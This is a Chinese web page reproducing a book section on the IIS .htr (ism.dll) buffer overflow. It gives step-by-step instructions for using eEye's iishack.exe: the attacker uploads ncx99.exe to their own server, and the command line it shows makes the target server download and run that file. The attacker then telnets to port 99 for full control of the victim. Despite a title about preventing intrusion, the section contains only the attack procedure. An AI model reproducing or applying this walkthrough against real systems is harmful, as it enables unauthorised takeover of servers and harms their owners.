黑客攻防技术内幕-防止入侵的方法(9)
6.6 htr溢出入侵
6.6 htr溢出入侵
在IIS的Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在Web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm利用这个漏洞,eEye写了两个程序:iishack.exe和ncx99.exe。
在命令提示符下运行iishack程序,如图6-60所示。
图6-60 iishack运行界面
命令行运行格式:
iishack 目标主机 端口URL(ncx99链接路径)
入侵者必须自己有一个空间,把ncx99.exe上传到该空间下,比如入侵者将ncx99.exe上传的路径是:61.129.81.122/ls-net/ncx99.exe,而对方的IIS server是sh.kill.com.cn,则输入如下内容:
iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe
如图6-61所示。
注意:
在输入ncx99.exe路径时不带http://。
图6-61 htr溢出
接着在提示符下输入:telnet sh.kill.com.cn 99即可通过99号端口登录到对方服务器。这样,入侵者就可以完全控制目标计算机。
Tags:
作者:风未起时评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论